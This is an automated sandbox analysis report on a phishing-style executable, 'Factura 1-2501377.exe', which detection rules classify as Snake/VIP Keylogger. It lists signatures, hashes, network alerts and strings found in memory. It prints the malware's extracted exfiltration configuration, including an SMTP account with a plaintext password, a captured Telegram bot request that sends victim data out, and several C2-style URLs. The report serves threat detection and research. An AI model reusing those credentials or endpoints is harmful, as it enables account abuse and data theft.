Windows Analysis Report
Factura 1-2501377.exe

Overview

General Information

Sample name: Factura 1-2501377.exe
Analysis ID: 1651217
MD5: ba1ba279b7001f7a2062f51e4327b49a
SHA1: 67051fb8047015d225df80754353c95c256a337b
SHA256: 86d4c0b6d645041101606bc402ae23455d0e85fc4894455984d60855351ba2f5
Tags: exeuser-lowmal3
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Sample uses string decryption to hide its real strings
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Found malware configuration
Source: 00000004.00000002.3340632815.0000000003021000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "ercan.gural@mupa.com.tr", "Password": "$Rc9Ff8y", "Host": "webmail.mupa.com.tr", "Port": "587"}
Source: 00000004.00000002.3340632815.0000000003021000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "ercan.gural@mupa.com.tr", "Password": "$Rc9Ff8y", "Host": "webmail.mupa.com.tr", "Port": "587", "Version": "4.4"}
Multi AV Scanner detection for submitted file
Source: Factura 1-2501377.exe ReversingLabs: Detection: 38%
Source: Factura 1-2501377.exe Virustotal: Detection: 35% Perma Link
Joe Sandbox ML detected suspicious sample
Source: Submited Sample Neural Call Log Analysis: 99.3%
Sample uses string decryption to hide its real strings
Source: 0.2.Factura 1-2501377.exe.471d7b0.3.unpack String decryptor: ercan.gural@mupa.com.tr
Source: 0.2.Factura 1-2501377.exe.471d7b0.3.unpack String decryptor: $Rc9Ff8y
Source: 0.2.Factura 1-2501377.exe.471d7b0.3.unpack String decryptor: webmail.mupa.com.tr
Source: 0.2.Factura 1-2501377.exe.471d7b0.3.unpack String decryptor: garyantonio0934@gmail.com
Source: 0.2.Factura 1-2501377.exe.471d7b0.3.unpack String decryptor: 587
Source: 0.2.Factura 1-2501377.exe.471d7b0.3.unpack String decryptor:

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses 32bit PE files
Source: Factura 1-2501377.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49693 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: Factura 1-2501377.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 079F7E42h 0_2_079F7438
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 0160F45Dh 4_2_0160F2D1
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 0160F45Dh 4_2_0160F4AC
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 0160FC19h 4_2_0160F961
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 05A0D069h 4_2_05A0CDC0
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 05A0F781h 4_2_05A0F4D8
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 05A0EED1h 4_2_05A0EC28
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 05A0EA79h 4_2_05A0E7D0
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 05A0E1C9h 4_2_05A0DF20
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 05A03308h 4_2_05A02EE6
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 05A03308h 4_2_05A02EF0
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 05A0D919h 4_2_05A0D670
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 4_2_05A00673
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 05A0FBD9h 4_2_05A0F930
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 05A0F329h 4_2_05A0F080
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 4_2_05A00040
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 4_2_05A00853
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 05A00D0Dh 4_2_05A00B30
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 05A016F8h 4_2_05A00B30
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 05A0E621h 4_2_05A0E378
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 05A02D41h 4_2_05A02A90
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 05A0DD71h 4_2_05A0DAC8
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 05A03308h 4_2_05A03236
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 05A0D4C1h 4_2_05A0D218

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2060048 - Severity 1 - ET MALWARE Snake Keylogger Exfil via SMTP (VIP Recovery) : 192.168.2.8:49715 -> 94.199.205.104:587
Source: Network traffic Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49709 -> 149.154.167.220:443
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.8:49715 -> 94.199.205.104:587
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841618%0D%0ADate%20and%20Time:%2028/03/2025%20/%2021:04:31%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841618%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View IP Address: 104.21.32.1 104.21.32.1
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AEROTEK-ASTR AEROTEK-ASTR
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49695 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49692 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49698 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49694 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49702 -> 104.21.32.1:443
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.2.8:49715 -> 94.199.205.104:587
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49693 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841618%0D%0ADate%20and%20Time:%2028/03/2025%20/%2021:04:31%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841618%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic DNS traffic detected: DNS query: webmail.mupa.com.tr
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 28 Mar 2025 14:18:34 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: Factura 1-2501377.exe, 00000004.00000002.3340632815.000000000320F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: Factura 1-2501377.exe, 00000000.00000002.885422652.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3338165117.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: Factura 1-2501377.exe, 00000000.00000002.885422652.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3340632815.0000000003021000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3338165117.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: Factura 1-2501377.exe, 00000000.00000002.885422652.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3340632815.0000000003021000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3338165117.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Factura 1-2501377.exe, 00000004.00000002.3340632815.0000000003021000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: Factura 1-2501377.exe, 00000004.00000002.3340632815.0000000003021000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: Factura 1-2501377.exe, 00000000.00000002.885422652.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3338165117.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: Factura 1-2501377.exe, 00000004.00000002.3340632815.0000000003021000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Factura 1-2501377.exe, 00000000.00000002.885422652.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3340632815.0000000003021000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3338165117.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: Factura 1-2501377.exe, 00000004.00000002.3340632815.000000000320F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://webmail.mupa.com.tr
Source: Factura 1-2501377.exe, 00000004.00000002.3338879017.00000000011C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.0000000004302000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3343087060.000000000433C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org?q=
Source: Factura 1-2501377.exe, 00000004.00000002.3340632815.0000000003106000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: Factura 1-2501377.exe, 00000000.00000002.885422652.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3340632815.0000000003106000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3338165117.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: Factura 1-2501377.exe, 00000004.00000002.3340632815.0000000003106000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Factura 1-2501377.exe, 00000004.00000002.3340632815.0000000003106000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841618%0D%0ADate%20a
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.0000000004302000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3343087060.000000000433C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.0000000004302000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3343087060.000000000433C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.0000000004302000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3343087060.000000000433C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Factura 1-2501377.exe, 00000004.00000002.3340632815.00000000031B3000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3340632815.00000000031E4000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3340632815.00000000031A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Factura 1-2501377.exe, 00000004.00000002.3340632815.00000000031B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en4
Source: Factura 1-2501377.exe, 00000004.00000002.3340632815.00000000031AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlBDr
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.0000000004302000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3343087060.000000000433C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.0000000004302000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3343087060.000000000433C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.0000000004302000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3343087060.000000000433C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.0000000004302000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3343087060.000000000433C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gemini.google.com/app?q=
Source: Factura 1-2501377.exe, 00000004.00000002.3340632815.0000000003106000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3340632815.000000000306F000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3340632815.00000000030DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: Factura 1-2501377.exe, 00000000.00000002.885422652.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3338165117.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3340632815.000000000306F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Factura 1-2501377.exe, 00000004.00000002.3340632815.000000000309A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/45.92.229.138
Source: Factura 1-2501377.exe, 00000004.00000002.3340632815.0000000003106000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3340632815.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3340632815.000000000309A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/45.92.229.138$
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.0000000004302000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3343087060.000000000433C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/v20w
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.0000000004302000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3343087060.000000000433C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: Factura 1-2501377.exe, 00000004.00000002.3340632815.00000000031E4000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3340632815.00000000031D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: Factura 1-2501377.exe, 00000004.00000002.3340632815.00000000031E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/4
Source: Factura 1-2501377.exe, 00000004.00000002.3340632815.00000000031DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lBDr
Source: unknown Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49693 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49709 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 4.2.Factura 1-2501377.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.Factura 1-2501377.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.Factura 1-2501377.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Factura 1-2501377.exe.46d9990.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Factura 1-2501377.exe.46d9990.4.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
